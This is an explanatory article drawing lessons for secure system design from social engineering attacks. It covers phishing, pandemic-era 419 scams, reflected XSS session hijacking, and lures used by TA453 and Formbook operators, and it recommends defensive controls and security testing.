3 Lessons on Secure System Design From Social Engineering Attacks

Engineering is often associated with infrastructure, machines, computers, as well as software. But there’s one other kind of engineering many have likely already encountered unwittingly. It’s called social engineering–the kind of engineering many frown upon. For years, social engineering has played a crucial role in the global cyber threat landscape. Around 98 percent of cyber-attacks rely on social engineering.

Social engineering deservingly gets the bad rap it has now, but it can offer some lessons on coming up with secure systems or designs. The constant evolution and endless new approaches cybercriminals employ to deceive people show that ingenuousness has no limits when people are determined to achieve something. Social engineering can teach software engineers and system designers a few things on how to ensure security and privacy.

Do not assume everyone is smart enough not to fall for common, old tricks
How does phishing work? This form of social engineering attempts to trick someone into submitting or revealing sensitive information through deceptive interfaces or guided processes. A basic example of this is the sending of links (via email, chat, or text message) which lead to web pages that emulate the appearance and operation of a web app or online services like social media, online banking, or a FinTech website.

It is a common cyberattack that could be easily avoided if everyone has the habit of examining the links they are clicking and verifying the websites they are submitting their details onto. Regrettably, many still become victims of this basic phishing tactic. According to CISCO’s Cybersecurity Threat Trends report for 2021, around 90 percent of data breaches happened because of phishing.

It is for this reason that anti-phishing solutions are necessary. Software tools that scan links and alert device users over their potentially risky actions are important to keep persistent phishing attacks at bay. Mechanisms that intervene against phishing attacks are important even when most people are already aware of the risks and nature of social engineering attacks.

At the height of the COVID-19 pandemic, for example, phishing attempts that promised money from a so-called “global empowerment fund” managed to victimize thousands. This is no different from old 419 or Nigerian scams, but many still fell for it. It can be said that pandemic-induced desperation is a big factor. According to one cybersecurity firm, some people even believed a version of this pandemic 419 scam that purportedly came from the “Chief Justice of Canada.”

It may sound unnecessary to force users to use multi-factor authentication or annoyingly repetitive to include security reminders in apps, but the benefits overwhelmingly outweigh the inconveniences, especially for apps that involve financial transactions. There’s a reason why Facebook, by default, keeps alerting users when a login from an unknown device is made and why banks and FinTech companies keep asking for OTPs for transactions and periodic password changes.

Simple threats evolve into something more technical and harder to stop.

Many already understand that most social engineering attacks are based on how people respond to the bait they are presented with. The attack succeeds when it manages to obtain the desired actions from the target. Those who click on links sent to their emails or instant messages and proceed to log in to simulated or fake forms, for example, expose themselves to the possibility of having their login credentials stolen. If they carefully examined the link first and decided to ignore it because of its suspicious nature, they would have avoided becoming victims of phishing.

Unfortunately, this is not always the case. Some attacks come with a technical component most people are unlikely to realize. A password recovery phishing attack, for instance, may actually send the victim to the real password recovery page for a certain account or platform. However, the process may entail the activation of a malicious script in the background to hijack a browser’s session cookie.

This malware-aided session hijacking scheme is achieved through a reflected cross-scripting (XSS) attack that allows the perpetrator to possibly gain privileged access to a network. A reflected XSS attack entails the exploitation of a vulnerability in an application to inject JavaScript, HTML, or some other anomalous code into the contents of a website. If the code injection is successful, it can then be executed in the victim's browser (if the victim views the infected page), allowing the perpetrator to bypass the same-origin policy of a browser and access supposedly hidden or private information.

This is why social engineering cannot be fully addressed by cybersecurity education alone. The right defenses call for the implementation of security controls capable of detecting threats such as cross-site scripting.

There are always new ways to exploit human weaknesses when it comes to cybersecurity

Humans are still the weakest link in the cybersecurity chain. This old expression continues to hold true until now. It is difficult to instill in people habits that boost cybersecurity, and equally challenging to remove risky habits like clicking on links or downloads without second thoughts.

This problem of human weakness is aggravated by the never-ending “ingenuity” of cybercriminals. They always find new ways to tap on the inherent nature of people to sabotage their own cybersecurity.

Examples of these new ways of exploiting human cybersecurity weaknesses are listed in CSO Online Editor Michael Hill’s piece about the strangest social engineering attacks of 2021. One of which is a scam involving the threat actor called TA453, which spent significant amounts of time establishing relationships with European professors and policy experts. The goal of this scheme was to steal the credentials of reputable personalities or people with authority to be used in
cybercrimes later on.

Another notable attack involves posers introducing themselves as sports agents to soccer clubs. They try to gain the trust of young soccer players and fans to make it easier to convince the targets to download videos and other files laced with the malware called Formbook. This malicious software is used to steal information and is often found in darkweb markets as a malware-as-a-service offering.

Cybercriminals are people themselves, and they know how other people think and behave. With this reality, the quest to design secure systems never ends because attackers can always come up with a new strategy if they realize their previous schemes are no longer effective or automatically detected by automated security controls. Again, this is not an excuse not to develop secure apps or design secure systems. It is a reminder of the need for continuous improvement and the necessity of collaborative cyber threat intelligence.

Summing it all up
It is true that the biggest defense against social engineering is cybersecurity education. Everyone should be taught proper cyber hygiene and be able to practice precautionary measures. Also, it is crucial for everyone to be up-to-date with the latest social engineering tactics. The success of a social engineering attack ultimately rests on the people being attacked. However, this does not mean that all efforts should focus on cybersecurity education and people monitoring.

There are things app developers or system builders can do to reduce the success potential of phishing and other social engineering attacks. Doing continuous security controls testing, for one, facilitates the detection of vulnerabilities that can enable cross-site scripting and other sophisticated attacks bundled with social engineering.